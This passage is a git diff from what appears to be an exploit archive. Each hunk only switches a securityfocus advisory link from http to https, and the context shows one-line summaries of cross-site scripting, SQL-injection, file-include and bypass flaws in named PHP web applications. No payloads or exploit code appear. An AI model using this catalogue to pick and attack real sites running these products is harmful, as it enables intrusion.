a/exploits/php/webapps/30174.txt +++ b/exploits/php/webapps/30174.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24414/info +source: https://www.securityfocus.com/bid/24414/info Just For Fun Network Management and Monitoring System (JFFNMS) is prone to multiple remote vulnerabilities, including a cross-site scripting issue, an SQL-injection issue, and multiple information-disclosure issues. diff --git a/exploits/php/webapps/30175.txt b/exploits/php/webapps/30175.txt index 1da5709b6..907f10f4e 100644 --- a/exploits/php/webapps/30175.txt +++ b/exploits/php/webapps/30175.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24422/info +source: https://www.securityfocus.com/bid/24422/info BBpress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30190.txt b/exploits/php/webapps/30190.txt index d44aa84b9..3b5c95586 100644 --- a/exploits/php/webapps/30190.txt +++ b/exploits/php/webapps/30190.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24479/info +source: https://www.securityfocus.com/bid/24479/info The Joomla! Letterman Subscriber module is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30197.txt b/exploits/php/webapps/30197.txt index a2357afc9..594cdeb54 100644 --- a/exploits/php/webapps/30197.txt +++ b/exploits/php/webapps/30197.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24513/info +source: https://www.securityfocus.com/bid/24513/info WSPortal is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/30200.txt b/exploits/php/webapps/30200.txt index 0d316a5e7..cb8997695 100644 --- a/exploits/php/webapps/30200.txt +++ b/exploits/php/webapps/30200.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24517/info +source: https://www.securityfocus.com/bid/24517/info Php Hosting Biller is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30201.txt b/exploits/php/webapps/30201.txt index 51012fa17..f7d4b4db9 100644 --- a/exploits/php/webapps/30201.txt +++ b/exploits/php/webapps/30201.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24522/info +source: https://www.securityfocus.com/bid/24522/info Fuzzylime is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30217.txt b/exploits/php/webapps/30217.txt index 3902e3aa0..306280fb0 100644 --- a/exploits/php/webapps/30217.txt +++ b/exploits/php/webapps/30217.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24565/info +source: https://www.securityfocus.com/bid/24565/info Wrapper.php for OsCommerce is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30220.txt b/exploits/php/webapps/30220.txt index 9272e1bd0..ebb2e1bef 100644 --- a/exploits/php/webapps/30220.txt +++ b/exploits/php/webapps/30220.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24572/info +source: https://www.securityfocus.com/bid/24572/info PHP Accounts is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30221.txt b/exploits/php/webapps/30221.txt index 3f37ebe99..e4a6811e3 100644 --- a/exploits/php/webapps/30221.txt +++ b/exploits/php/webapps/30221.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24574/info +source: https://www.securityfocus.com/bid/24574/info PHP Accounts is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/php/webapps/30223.txt b/exploits/php/webapps/30223.txt index a58c776d2..0d8525d76 100644 --- a/exploits/php/webapps/30223.txt +++ b/exploits/php/webapps/30223.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24584/info +source: https://www.securityfocus.com/bid/24584/info NetClassifieds is prone to multiple input-validation vulnerabilities because the application fails to sanitize user-supplied input. These vulnerabilities include multiple SQL-injection issues and cross-site scripting issues. diff --git a/exploits/php/webapps/30225.txt b/exploits/php/webapps/30225.txt index ef204cb31..c214f79a6 100644 --- a/exploits/php/webapps/30225.txt +++ b/exploits/php/webapps/30225.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24590/info +source: https://www.securityfocus.com/bid/24590/info eNdonesia is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/30226.txt b/exploits/php/webapps/30226.txt index 46faa8c81..0c1ad8c6c 100644 --- a/exploits/php/webapps/30226.txt +++ b/exploits/php/webapps/30226.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24590/info +source: https://www.securityfocus.com/bid/24590/info eNdonesia is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/30227.txt b/exploits/php/webapps/30227.txt index c37997d70..f4a7689ca 100644 --- a/exploits/php/webapps/30227.txt +++ b/exploits/php/webapps/30227.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24591/info +source: https://www.securityfocus.com/bid/24591/info The 'mod_forum' component for Joomla and Mambo is prone to a remote file-include vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30230.txt b/exploits/php/webapps/30230.txt index 539f410bc..0744d9304 100644 --- a/exploits/php/webapps/30230.txt +++ b/exploits/php/webapps/30230.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24621/info +source: https://www.securityfocus.com/bid/24621/info MyNews is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/30232.txt b/exploits/php/webapps/30232.txt index 76de63734..2f828f0eb 100644 --- a/exploits/php/webapps/30232.txt +++ b/exploits/php/webapps/30232.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24626/info +source: https://www.securityfocus.com/bid/24626/info Calendrix is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30234.txt b/exploits/php/webapps/30234.txt index 0de7215bd..76202ae4f 100644 --- a/exploits/php/webapps/30234.txt +++ b/exploits/php/webapps/30234.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24633/info +source: https://www.securityfocus.com/bid/24633/info Calendarix is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/php/webapps/30249.txt b/exploits/php/webapps/30249.txt index 3db679b05..9e68b5add 100644 --- a/exploits/php/webapps/30249.txt +++ b/exploits/php/webapps/30249.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24634/info +source: https://www.securityfocus.com/bid/24634/info Papoo is prone to an authentication-bypass vulnerability because the application fails to check user privileges when accessing the administration pages. diff --git a/exploits/php/webapps/30253.txt b/exploits/php/webapps/30253.txt index e8e8e734f..92207caae 100644 --- a/exploits/php/webapps/30253.txt +++ b/exploits/php/webapps/30253.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24681/info +source: https://www.securityfocus.com/bid/24681/info eTicket is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/30259.txt b/exploits/php/webapps/30259.txt index 27df8466c..60bb292f3 100644 --- a/exploits/php/webapps/30259.txt +++ b/exploits/php/webapps/30259.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24742/info +source: https://www.securityfocus.com/bid/24742/info Claroline is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30261.txt b/exploits/php/webapps/30261.txt index ee21c7d1c..f2adbef71 100644 --- a/exploits/php/webapps/30261.txt +++ b/exploits/php/webapps/30261.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24748/info +source: https://www.securityfocus.com/bid/24748/info Moodle is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30262.txt b/exploits/php/webapps/30262.txt index 009a3bc7c..9ffe26029 100644 --- a/exploits/php/webapps/30262.txt +++ b/exploits/php/webapps/30262.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24749/info +source: https://www.securityfocus.com/bid/24749/info Liesbeth Base CMS is prone to an information-disclosure vulnerability. diff --git a/exploits/php/webapps/30277.txt b/exploits/php/webapps/30277.txt index 4332468bc..44a1e8ede 100644 --- a/exploits/php/webapps/30277.txt +++ b/exploits/php/webapps/30277.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24770/info +source: https://www.securityfocus.com/bid/24770/info Maia Mailguard is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30283.txt b/exploits/php/webapps/30283.txt index 28127f08f..52cd3f8f8 100644 --- a/exploits/php/webapps/30283.txt +++ b/exploits/php/webapps/30283.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24828/info +source: https://www.securityfocus.com/bid/24828/info Vulnerabilities in the SquirrelMail G/PGP encryption plugin may allow malicious webmail users to execute system commands remotely. These issues occur because the application fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/30290.txt b/exploits/php/webapps/30290.txt index 524453157..f93ee69b5 100644 --- a/exploits/php/webapps/30290.txt +++ b/exploits/php/webapps/30290.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24864/info +source: https://www.securityfocus.com/bid/24864/info The IBM Proventia Sensor Appliance is prone to multiple input-validation vulnerabilities, including multiple remote file-include issues and a cross-site scripting issue. diff --git a/exploits/php/webapps/30293.txt b/exploits/php/webapps/30293.txt index f0d5b5f1b..71b265a39 100644 --- a/exploits/php/webapps/30293.txt +++ b/exploits/php/webapps/30293.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24880/info +source: https://www.securityfocus.com/bid/24880/info Helma is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30294.txt b/exploits/php/webapps/30294.txt index fdea054f5..86e0fad3d 100644 --- a/exploits/php/webapps/30294.txt +++ b/exploits/php/webapps/30294.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24884/info +source: https://www.securityfocus.com/bid/24884/info Inmostore is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/30299.txt b/exploits/php/webapps/30299.txt index 95237ed38..47a529383 100644 --- a/exploits/php/webapps/30299.txt +++ b/exploits/php/webapps/30299.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24898/info +source: https://www.securityfocus.com/bid/24898/info activeWeb contentserver is prone to a client-side input-validation vulnerability because the application fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/30301.txt b/exploits/php/webapps/30301.txt index 0e0e51ba0..de52eef26 100644 --- a/exploits/php/webapps/30301.txt +++ b/exploits/php/webapps/30301.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24910/info +source: https://www.securityfocus.com/bid/24910/info AzDG Dating Gold is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30302.txt b/exploits/php/webapps/30302.txt index 7ef82b123..b991c67a5 100644 --- a/exploits/php/webapps/30302.txt +++ b/exploits/php/webapps/30302.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24910/info +source: https://www.securityfocus.com/bid/24910/info AzDG Dating Gold is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30303.txt b/exploits/php/webapps/30303.txt index 14f2661f5..cedfbe812 100644 --- a/exploits/php/webapps/30303.txt +++ b/exploits/php/webapps/30303.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24910/info +source: https://www.securityfocus.com/bid/24910/info AzDG Dating Gold is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30312.txt b/exploits/php/webapps/30312.txt index 3bac24fa3..fa3b44ca1 100644 --- a/exploits/php/webapps/30312.txt +++ b/exploits/php/webapps/30312.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24913/info +source: https://www.securityfocus.com/bid/24913/info Citadel WebCit is prone to multiple input-validation vulnerabilities, including multiple HTML-injection issues and a cross-site scripting issue, because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/30317.txt b/exploits/php/webapps/30317.txt index b0e249d6e..31a44f4a7 100644 --- a/exploits/php/webapps/30317.txt +++ b/exploits/php/webapps/30317.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24934/info +source: https://www.securityfocus.com/bid/24934/info Insanely Simple Blog is prone to multiple input-validation vulnerabilities, including cross-site scripting, HTML-injection, and SQL-injection issues, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30318.txt b/exploits/php/webapps/30318.txt index 70ebed738..01f5c50e6 100644 --- a/exploits/php/webapps/30318.txt +++ b/exploits/php/webapps/30318.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24934/info +source: https://www.securityfocus.com/bid/24934/info Insanely Simple Blog is prone to multiple input-validation vulnerabilities, including cross-site scripting, HTML-injection, and SQL-injection issues, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30320.txt b/exploits/php/webapps/30320.txt index 9c4d5e396..978ceb933 100644 --- a/exploits/php/webapps/30320.txt +++ b/exploits/php/webapps/30320.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24966/info +source: https://www.securityfocus.com/bid/24966/info geoBlog is prone to multiple security-bypass vulnerabilities because the application fails to properly validate users when deleting user blogs and comments. diff --git a/exploits/php/webapps/30321.txt b/exploits/php/webapps/30321.txt index 45d50f5f7..b3bb2f1d2 100644 --- a/exploits/php/webapps/30321.txt +++ b/exploits/php/webapps/30321.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24966/info +source: https://www.securityfocus.com/bid/24966/info geoBlog is prone to multiple security-bypass vulnerabilities because the application fails to properly validate users when deleting user blogs and comments. diff --git a/exploits/php/webapps/30323.txt b/exploits/php/webapps/30323.txt index a908f4e02..d8a87ba06 100644 --- a/exploits/php/webapps/30323.txt +++ b/exploits/php/webapps/30323.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24990/info +source: https://www.securityfocus.com/bid/24990/info UseBB is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30324.txt b/exploits/php/webapps/30324.txt index eb98c0281..ef83f4d0e 100644 --- a/exploits/php/webapps/30324.txt +++ b/exploits/php/webapps/30324.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24990/info +source: https://www.securityfocus.com/bid/24990/info UseBB is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30333.txt b/exploits/php/webapps/30333.txt index 93ebb14ff..c40364a87 100644 --- a/exploits/php/webapps/30333.txt +++ b/exploits/php/webapps/30333.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25011/info +source: https://www.securityfocus.com/bid/25011/info PHMe is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30366.txt b/exploits/php/webapps/30366.txt index 88c26dcf7..010f51e36 100644 --- a/exploits/php/webapps/30366.txt +++ b/exploits/php/webapps/30366.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25019/info +source: https://www.securityfocus.com/bid/25019/info AlstraSoft Video Share Enterprise is affected by multiple input-validation vulnerabilities. These issues include multiple cross-site scripting vulnerabilities and multiple SQL-injection vulnerabilities. diff --git a/exploits/php/webapps/30367.txt b/exploits/php/webapps/30367.txt index 5ac193ba7..2702ace69 100644 --- a/exploits/php/webapps/30367.txt +++ b/exploits/php/webapps/30367.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25022/info +source: https://www.securityfocus.com/bid/25022/info SMS Text Messaging Enterprise is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30368.txt b/exploits/php/webapps/30368.txt index a15e3eb39..b74541e3a 100644 --- a/exploits/php/webapps/30368.txt +++ b/exploits/php/webapps/30368.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25022/info +source: https://www.securityfocus.com/bid/25022/info SMS Text Messaging Enterprise is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30369.txt b/exploits/php/webapps/30369.txt index 9de8b8b5c..d59027cee 100644 --- a/exploits/php/webapps/30369.txt +++ b/exploits/php/webapps/30369.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25026/info +source: https://www.securityfocus.com/bid/25026/info AlstraSoft Affiliate Network Pro is affected by multiple input-validation vulnerabilities. These issues include multiple cross-site scripting isues and SQL-injection issues. diff --git a/exploits/php/webapps/30370.txt b/exploits/php/webapps/30370.txt index 4110521b2..f696960b6 100644 --- a/exploits/php/webapps/30370.txt +++ b/exploits/php/webapps/30370.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25026/info +source: https://www.securityfocus.com/bid/25026/info AlstraSoft Affiliate Network Pro is affected by multiple input-validation vulnerabilities. These issues include multiple cross-site scripting isues and SQL-injection issues. diff --git a/exploits/php/webapps/30371.txt b/exploits/php/webapps/30371.txt index 1812e8bd0..6cb2a2885 100644 --- a/exploits/php/webapps/30371.txt +++ b/exploits/php/webapps/30371.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25026/info +source: https://www.securityfocus.com/bid/25026/info AlstraSoft Affiliate Network Pro is affected by multiple input-validation vulnerabilities. These issues include multiple cross-site scripting isues and SQL-injection issues. diff --git a/exploits/php/webapps/30378.txt b/exploits/php/webapps/30378.txt index 9e3abf4f5..39132cc83 100644 --- a/exploits/php/webapps/30378.txt +++ b/exploits/php/webapps/30378.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25040/info +source: https://www.securityfocus.com/bid/25040/info The 'webbler' is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30379.html b/exploits/php/webapps/30379.html index 2cba36d2a..56952bac8 100644 --- a/exploits/php/webapps/30379.html +++ b/exploits/php/webapps/30379.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25045/info +source: https://www.securityfocus.com/bid/25045/info The 'webbler' is prone to an open-email-relay vulnerability. diff --git a/exploits/php/webapps/30380.txt b/exploits/php/webapps/30380.txt index 75a86b61e..cf8316da6 100644 --- a/exploits/php/webapps/30380.txt +++ b/exploits/php/webapps/30380.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25047/info +source: https://www.securityfocus.com/bid/25047/info cPanel is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30383.txt b/exploits/php/webapps/30383.txt index 2ebf46de5..5bce187d9 100644 --- a/exploits/php/webapps/30383.txt +++ b/exploits/php/webapps/30383.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25056/info +source: https://www.securityfocus.com/bid/25056/info Vikingboard is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/30384.txt b/exploits/php/webapps/30384.txt index 068a046fc..fa3e527e8 100644 --- a/exploits/php/webapps/30384.txt +++ b/exploits/php/webapps/30384.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25056/info +source: https://www.securityfocus.com/bid/25056/info Vikingboard is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/30385.txt b/exploits/php/webapps/30385.txt index c2e051b2e..574876812 100644 --- a/exploits/php/webapps/30385.txt +++ b/exploits/php/webapps/30385.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25056/info +source: https://www.securityfocus.com/bid/25056/info Vikingboard is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/30386.txt b/exploits/php/webapps/30386.txt index 3ea75ff16..f772ff204 100644 --- a/exploits/php/webapps/30386.txt +++ b/exploits/php/webapps/30386.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25056/info +source: https://www.securityfocus.com/bid/25056/info Vikingboard is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/30387.txt b/exploits/php/webapps/30387.txt index 39eedf2db..326deafc2 100644 --- a/exploits/php/webapps/30387.txt +++ b/exploits/php/webapps/30387.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25060/info +source: https://www.securityfocus.com/bid/25060/info Vikingboard is prone to multiple information-disclosure weaknesses because attackers may disclose sensitive information that may be used in other attacks on the system. diff --git a/exploits/php/webapps/30388.txt b/exploits/php/webapps/30388.txt index a26c69e40..93304d138 100644 --- a/exploits/php/webapps/30388.txt +++ b/exploits/php/webapps/30388.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25060/info +source: https://www.securityfocus.com/bid/25060/info Vikingboard is prone to multiple information-disclosure weaknesses because attackers may disclose sensitive information that may be used in other attacks on the system. diff --git a/exploits/php/webapps/30389.txt b/exploits/php/webapps/30389.txt index 55519596e..3281723da 100644 --- a/exploits/php/webapps/30389.txt +++ b/exploits/php/webapps/30389.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25065/info +source: https://www.securityfocus.com/bid/25065/info iFoto is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30390.txt b/exploits/php/webapps/30390.txt index 066857e24..5b4d32384 100644 --- a/exploits/php/webapps/30390.txt +++ b/exploits/php/webapps/30390.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25072/info +source: https://www.securityfocus.com/bid/25072/info BSM Store Dependent Forums is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/php/webapps/30391.txt b/exploits/php/webapps/30391.txt index b285f3031..ef6dd67ae 100644 --- a/exploits/php/webapps/30391.txt +++ b/exploits/php/webapps/30391.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25073/info +source: https://www.securityfocus.com/bid/25073/info PhpHostBot is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/30403.txt b/exploits/php/webapps/30403.txt index 73f2d8b87..ca46b08af 100644 --- a/exploits/php/webapps/30403.txt +++ b/exploits/php/webapps/30403.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25085/info +source: https://www.securityfocus.com/bid/25085/info The WP-FeedStats plugin for WordPress is prone to an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/30405.txt b/exploits/php/webapps/30405.txt index b32f5052a..ea3b78066 100644 --- a/exploits/php/webapps/30405.txt +++ b/exploits/php/webapps/30405.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25094/info +source: https://www.securityfocus.com/bid/25094/info Bandersnatch is prone to multiple input-validation vulnerabilities because the application fails to sanitize user-supplied input. These issues include multiple SQL-injections vulnerabilities and an HTML-injection vulnerability. diff --git a/exploits/php/webapps/30429.txt b/exploits/php/webapps/30429.txt index 303c08bcd..b6e2e9b27 100644 --- a/exploits/php/webapps/30429.txt +++ b/exploits/php/webapps/30429.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25116/info +source: https://www.securityfocus.com/bid/25116/info phpCoupon is prone to a remote payment-bypass vulnerability because the application fails to properly secure PayPal payment transactions. diff --git a/exploits/php/webapps/30433.txt b/exploits/php/webapps/30433.txt index 35a72669c..3376f9f6a 100644 --- a/exploits/php/webapps/30433.txt +++ b/exploits/php/webapps/30433.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25129/info +source: https://www.securityfocus.com/bid/25129/info IT!CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/30434.txt b/exploits/php/webapps/30434.txt index 3fd988c09..8c642b17e 100644 --- a/exploits/php/webapps/30434.txt +++ b/exploits/php/webapps/30434.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25129/info +source: https://www.securityfocus.com/bid/25129/info IT!CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/30435.txt b/exploits/php/webapps/30435.txt index 8a6ec3d47..a4411e980 100644 --- a/exploits/php/webapps/30435.txt +++ b/exploits/php/webapps/30435.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25129/info +source: https://www.securityfocus.com/bid/25129/info IT!CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/30436.txt b/exploits/php/webapps/30436.txt index d9d0a9f46..351988701 100644 --- a/exploits/php/webapps/30436.txt +++ b/exploits/php/webapps/30436.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25138/info +source: https://www.securityfocus.com/bid/25138/info Aplomb Poll is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30437.txt b/exploits/php/webapps/30437.txt index cd688023a..f28220555 100644 --- a/exploits/php/webapps/30437.txt +++ b/exploits/php/webapps/30437.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25138/info +source: https://www.securityfocus.com/bid/25138/info Aplomb Poll is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30438.txt b/exploits/php/webapps/30438.txt index d7a17b48c..c85b60f0c 100644 --- a/exploits/php/webapps/30438.txt +++ b/exploits/php/webapps/30438.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25138/info +source: https://www.securityfocus.com/bid/25138/info Aplomb Poll is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30442.txt b/exploits/php/webapps/30442.txt index 41b6f8ded..c19355565 100644 --- a/exploits/php/webapps/30442.txt +++ b/exploits/php/webapps/30442.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25166/info +source: https://www.securityfocus.com/bid/25166/info WebDirector is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30445.txt b/exploits/php/webapps/30445.txt index 332578393..cc6ee396b 100644 --- a/exploits/php/webapps/30445.txt +++ b/exploits/php/webapps/30445.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25183/info +source: https://www.securityfocus.com/bid/25183/info Tour de France Pool for Joomla is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/30448.txt b/exploits/php/webapps/30448.txt index 453511504..f9bb14941 100644 --- a/exploits/php/webapps/30448.txt +++ b/exploits/php/webapps/30448.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25193/info +source: https://www.securityfocus.com/bid/25193/info LANAI CMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/php/webapps/30449.txt b/exploits/php/webapps/30449.txt index 96c1e2543..3a4515850 100644 --- a/exploits/php/webapps/30449.txt +++ b/exploits/php/webapps/30449.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25193/info +source: https://www.securityfocus.com/bid/25193/info LANAI CMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/php/webapps/30450.txt b/exploits/php/webapps/30450.txt index 902c90e28..8c9c36e08 100644 --- a/exploits/php/webapps/30450.txt +++ b/exploits/php/webapps/30450.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25193/info +source: https://www.securityfocus.com/bid/25193/info LANAI CMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/php/webapps/30452.txt b/exploits/php/webapps/30452.txt index 62189c217..78cafd0f5 100644 --- a/exploits/php/webapps/30452.txt +++ b/exploits/php/webapps/30452.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25198/info +source: https://www.securityfocus.com/bid/25198/info J! Reactions is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/30453.txt b/exploits/php/webapps/30453.txt index 46cb43cf7..4658a6677 100644 --- a/exploits/php/webapps/30453.txt +++ b/exploits/php/webapps/30453.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25212/info +source: https://www.securityfocus.com/bid/25212/info The 'snif' program is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30456.txt b/exploits/php/webapps/30456.txt index 1c7e44bf1..1e9454538 100644 --- a/exploits/php/webapps/30456.txt +++ b/exploits/php/webapps/30456.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25226/info +source: https://www.securityfocus.com/bid/25226/info VietPHP is prone to multiple remote file-include vulnerabilities because it fails to 